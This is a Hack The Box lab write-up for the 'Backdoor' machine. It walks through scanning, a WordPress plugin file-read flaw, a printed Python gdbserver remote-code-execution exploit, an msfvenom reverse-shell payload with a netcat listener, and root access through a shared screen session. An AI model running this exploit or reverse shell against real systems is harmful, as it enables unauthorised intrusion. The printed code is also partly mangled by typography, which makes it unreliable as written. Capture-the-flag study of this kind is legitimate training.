Backdoor HTB Write-up| Backdoor hack the box Walkthrough | Backdoor.htb|10.10.11.125| backdoor.htb| Write Up : backdoor HTB
--
Information gathering
First use nmap for port scanning
┌──(kali㉿kali)-[~]
└─$ nmap -A -sC -sV -sS -p- 10.10.11.125
Starting Nmap 7.91 ( https://nmap.org ) at 2021–11–30 02:16 EST
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.14% done
Nmap scan report for backdoor.htb (10.10.11.125)
Host is up (0.20s latency).
Not shown: 65417 closed ports, 115 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
| 256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
|_ 256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.8.1
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Backdoor – Real-Life
1337/tcp open waste?
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=11/30%OT=22%CT=1%CU=37705%PV=Y%DS=2%DC=T%G=Y%TM=61A5D5
OS:A1%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)OP
OS:S(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST
OS:11NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)EC
OS:N(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 587/tcp)
HOP RTT ADDRESS
1 204.20 ms 10.10.14.1
2 204.33 ms backdoor.htb (10.10.11.125)OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1469.77 seconds
You can see from the above that the target machine uses WordPress 5.8.1 CMS as a service to build. so we use wpscan to scan all vulnerable plugins.
wpscan output
wpscan — url http://10.10.11.125 — enumerate -Ua 1 ⨯
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | ‘_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|WordPress Security Scanner by the WPScan Team
Version 3.8.18
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________[i] Updating the Database …
[i] Update completed.[+] URL: http://10.10.11.125/ [10.10.11.125]
[+] Started: Tue Nov 30 02:29:55 2021Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%[+] XML-RPC seems to be enabled: http://10.10.11.125/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| — http://codex.wordpress.org/XML-RPC_Pingback_API
| — https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| — https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| — https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| — https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/[+] WordPress readme found: http://10.10.11.125/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%[+] Upload directory has listing enabled: http://10.10.11.125/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%[+] The external WP-Cron seems to be enabled: http://10.10.11.125/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| — https://www.iplocation.net/defend-wordpress-from-ddos
| — https://github.com/wpscanteam/wpscan/issues/1299[+] WordPress version 5.8.1 identified (Insecure, released on 2021–09–09).
| Found By: Rss Generator (Passive Detection)
| — http://10.10.11.125/index.php/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>
| — http://10.10.11.125/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>[+] WordPress theme in use: twentyseventeen
| Location: http://10.10.11.125/wp-content/themes/twentyseventeen/
| Latest Version: 2.8 (up to date)
| Last Updated: 2021–07–22T00:00:00.000Z
| Readme: http://10.10.11.125/wp-content/themes/twentyseventeen/readme.txt
| Style URL: http://10.10.11.125/wp-content/themes/twentyseventeen/style.css?ver=20201208
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a f…
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.8 (80% confidence)
| Found By: Style (Passive Detection)
| — http://10.10.11.125/wp-content/themes/twentyseventeen/style.css?ver=20201208, Match: ‘Version: 2.8’[+] Enumerating Vulnerable Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
Checking Known Locations — Time: 00:00:15 <========================================================================================> (358 / 358) 100.00% Time: 00:00:15
[+] Checking Theme Versions (via Passive and Aggressive Methods)[i] No themes Found.
[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
Checking Known Locations — Time: 00:01:50 <======================================================================================> (2575 / 2575) 100.00% Time: 00:01:50[i] No Timthumbs Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups — Time: 00:00:06 <=========================================================================================> (137 / 137) 100.00% Time: 00:00:06[i] No Config Backups Found.
[+] Enumerating DB Exports (via Passive and Aggressive Methods)
Checking DB Exports — Time: 00:00:03 <===============================================================================================> (71 / 71) 100.00% Time: 00:00:03[i] No DB Exports Found.
[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to “Plain” for those to be detected)
Brute Forcing Attachment IDs — Time: 00:00:04 <====================================================================================> (100 / 100) 100.00% Time: 00:00:04[i] No Medias Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs — Time: 00:00:01 <==========================================================================================> (10 / 10) 100.00% Time: 00:00:01[i] User(s) Identified:
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| — http://10.10.11.125/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing — Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register[+] Finished: Tue Nov 30 02:32:37 2021
[+] Requests Done: 3311
[+] Cached Requests: 8
[+] Data Sent: 914.804 KB
[+] Data Received: 18.281 MB
[+] Memory used: 223.848 MB
[+] Elapsed time: 00:02:42
After scanning there is not a lot of useful information here, plugins and content are not scanned, but I know the administrator is the admin.
Look at the website content
next I try to find directory available on website .I use Dirb directory searching tool.
┌──(root💀kali)-[~]
└─# dirb http://10.10.11.125— — — — — — — — -
DIRB v2.22
By The Dark Raver
— — — — — — — — -START_TIME: Tue Nov 30 04:11:30 2021
URL_BASE: http://10.10.11.125/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt— — — — — — — — -
GENERATED WORDS: 4612
— — Scanning URL: http://10.10.11.125/ — —
+ http://10.10.11.125/index.php (CODE:301|SIZE:0)
+ http://10.10.11.125/server-status (CODE:403|SIZE:277)
==> DIRECTORY: http://10.10.11.125/wp-admin/
==> DIRECTORY: http://10.10.11.125/wp-content/
==> DIRECTORY: http://10.10.11.125/wp-includes/
+ http://10.10.11.125/xmlrpc.php (CODE:405|SIZE:42)
— — Entering directory: http://10.10.11.125/wp-admin/ — —
+ http://10.10.11.125/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.11.125/wp-admin/css/
==> DIRECTORY: http://10.10.11.125/wp-admin/images/
==> DIRECTORY: http://10.10.11.125/wp-admin/includes/
+ http://10.10.11.125/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.11.125/wp-admin/js/
==> DIRECTORY: http://10.10.11.125/wp-admin/maint/
==> DIRECTORY: http://10.10.11.125/wp-admin/network/
==> DIRECTORY: http://10.10.11.125/wp-admin/user/
— — Entering directory: http://10.10.11.125/wp-content/ — —
+ http://10.10.11.125/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://10.10.11.125/wp-content/plugins/
after directory search i found many directory so we check manually to every directory and find interesting on /wp-content/plugins
Only readme.txt has content, go in and take a look
Confirm that it is a plug-in, let’s go to exploit-db to search for vulnerabilities
let us find a vulnerabilities Directory Traversal
This is an arbitrary file download vulnerability, download a configuration file to see
Verify that the vulnerability exists and is exploitable, try logging in to the admin user with the database password . after try admin user with DB password I find DB password or admin password are different so I tried to enumerate port 1337 , find ruing service or server .
Use the LFI (Local File Inclusion) WordPress plugin for port 1337 reading, let’s try to
Just read the /proc/pid/cmdline file like this, where pid is a variable number. According to the test, the number range should be between 900–1000 . Important files in proc give information about running processes.
start attacking ….
Yes, you can see that there is a gdbserver service here. After testing, the service is set up on port 1337 and can be used
At the same time I found an interesting thing for linux privilege escalation
See, there is no getshell yet, it has already got everything from the roots, and no one is left.
user
Find exploit of gdbserver service REC
Step1 : First save the exploit locally (change Ip)
# Exploit Title: GNU gdbserver 9.2 — Remote Command Execution (RCE)
# Date: 2021–11–21
# Exploit Author: Roberto Gesteira Miñarro (7Rocky)
# Vendor Homepage: https://www.gnu.org/software/gdb/
# Software Link: https://www.gnu.org/software/gdb/download/
# Version: GNU gdbserver (Ubuntu 9.2–0ubuntu1~20.04) 9.2
# Tested on: Ubuntu Linux (gdbserver debugging x64 and x86 binaries)#!/usr/bin/env python3
import binascii
import socket
import struct
import syshelp = f’’’
Usage: python3 {sys.argv[0]} <gdbserver-ip:port> <path-to-shellcode>Example:
- Victim’s gdbserver -> 10.10.11.125:1337
- Attacker’s listener -> 10.10.14.6:44441. Generate shellcode with msfvenom:
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.100 LPORT=4444 PrependFork=true -o rev.bin2. Listen with Netcat:
$ nc -nlvp 44443. Run the exploit:
$ python3 {sys.argv[0]} 10.10.10.200:1337 rev.bin
‘’’def checksum(s: str) -> str:
res = sum(map(ord, s)) % 256
return f’{res:2x}’def ack(sock):
sock.send(b’+’)def send(sock, s: str) -> str:
sock.send(f’${s}#{checksum(s)}’.encode())
res = sock.recv(1024)
ack(sock)
return res.decode()def exploit(sock, payload: str):
send(sock, ‘qSupported:multiprocess+;qRelocInsn+;qvCont+;’)
send(sock, ‘!’)try:
res = send(sock, ‘vCont;s’)
data = res.split(‘;’)[2]
arch, pc = data.split(‘:’)
except Exception:
print(‘[!] ERROR: Unexpected response. Try again later’)
exit(1)if arch == ‘10’:
print(‘[+] Found x64 arch’)
pc = binascii.unhexlify(pc[:pc.index(‘0*’)])
pc += b’\0' * (8 — len(pc))
addr = hex(struct.unpack(‘<Q’, pc)[0])[2:]
addr = ‘0’ * (16 — len(addr)) + addr
elif arch == ‘08’:
print(‘[+] Found x86 arch’)
pc = binascii.unhexlify(pc)
pc += b’\0' * (4 — len(pc))
addr = hex(struct.unpack(‘<I’, pc)[0])[2:]
addr = ‘0’ * (8 — len(addr)) + addrhex_length = hex(len(payload))[2:]
print(‘[+] Sending payload’)
send(sock, f’M{addr},{hex_length}:{payload}’)
send(sock, ‘vCont;c’)def main():
if len(sys.argv) < 3:
print(help)
exit(1)ip, port = sys.argv[1].split(‘:’)
file = sys.argv[2]try:
with open(file, ‘rb’) as f:
payload = f.read().hex()
except FileNotFoundError:
print(f’[!] ERROR: File {file} not found’)
exit(1)with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.connect((ip, int(port)))
print(‘[+] Connected to target. Preparing exploit’)
exploit(sock, payload)
print(‘[*] Pwned!! Check your listener’)if __name__ == ‘__main_’:
main()
Step2 :
Then use msfvenom to generate a Trojan
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=4444 PrependFork=true -o rev.bin
Step3 : on netcat listener on port 4444
nc -nlvp 4444
Step4 :
run exploit
┌──(kali㉿kali)-[~/Downloads]
└─$ python3 50539.py 10.10.11.125:1337 rev.bin
[+] Connected to target. Preparing exploit
[+] Found x64 arch
[+] Sending payload
[*] Pwned!! Check your listener
Then successfully bounce back to a shell
┌──(kali㉿kali)-[~]
└─$ nc -nlvp 4444
listening on [any] 4444 …
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.125] 48584
id
uid=1000(user) gid=1000(user) groups=1000(user)
python3 -c “import pty;pty.spawn(‘/bin/bash’)”
user@Backdoor:/home/user$ cat user.txt
cat user.txt
28171exxxxxxxxxxxxxxxxxdbe
get user flag now trying to root
Root
find / -perm -4000 -ls 2>/dev/null
ps -ef | grep -i screen
SUID set on screen and there is session name root
export TERM=xterm
screen -x root/root
finally root
